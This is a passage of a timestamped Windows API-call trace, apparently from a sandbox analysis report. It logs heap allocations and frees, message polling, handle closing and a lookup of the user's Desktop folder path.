HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0087.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0087.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0087.675] FreeLibrary (hLibModule=0x76390000) returned 1 [0087.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.675] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0087.675] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0087.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0087.675] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0087.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0087.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0087.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0087.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0087.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0087.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0087.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0087.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0087.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0087.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0087.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0087.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9670 [0087.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9790 [0087.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa96b8 [0087.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0087.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9820 [0087.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0087.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0087.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9778 [0087.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0087.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0087.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.676] CloseHandle (hObject=0x2c4) returned 1 [0087.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0087.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0087.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0087.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0087.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0087.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0087.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0087.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0087.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0087.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0087.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0087.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0087.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0087.679] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0087.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0087.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0087.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0087.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0087.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0087.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0087.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0087.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0087.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0087.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0087.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0087.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0087.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0087.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0087.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0087.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa96e8 [0087.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9670 [0087.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9700 [0087.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0087.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9778 [0087.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0087.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0087.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa96b8 [0087.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0087.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0087.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0087.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0087.680] CloseHandle (hObject=0x294) returned 1 [0087.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0087.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0087.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2abe880 | out: hHeap=0x2af0000) returned 1 [0087.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0087.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0087.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0087.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0087.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0087.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0087.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0087.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0087.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0087.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0087.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0087.692] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0087.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0087.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0087.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0087.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0087.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0087.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0087.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0087.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0087.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0087.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0087.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0087.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0087.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0087.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0087.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0087.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0087.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0087.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0087.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0087.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0087.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0087.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0087.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0087.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0087.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0087.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0087.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0087.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0087.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0087.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0087.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0087.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0087.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0087.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0087.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0087.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0087.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37c0048 | out: hHeap=0x2af0000) returned 1 [0087.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0087.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0087.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0087.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0087.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0087.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0087.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0087.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0087.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0087.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0087.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0087.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0087.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0087.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0087.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0087.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0087.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0087.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0087.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0087.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0087.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0087.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0087.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0087.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0087.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0087.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0087.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0087.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0087.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0087.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0087.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0087.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0087.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0087.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0087.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0087.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0087.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0087.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0087.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0087.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0087.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75ba0 | out: hHeap=0x2af0000) returned 1 [0087.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0087.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0087.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0087.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0087.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0087.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0087.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0087.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0087.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0087.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0087.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0087.696] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0087.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0087.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0087.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0087.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0087.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0087.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0087.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0087.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0087.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0087.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71db8 [0087.697] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0087.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0087.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0087.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9310 [0087.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0087.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0087.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9058 [0087.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0087.697] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0087.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0087.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6488 [0087.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e88 [0087.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0087.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0087.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0087.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0087.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0087.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0087.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0087.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0087.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0087.698] HeapFree (in: hHeap=0x2af0000, 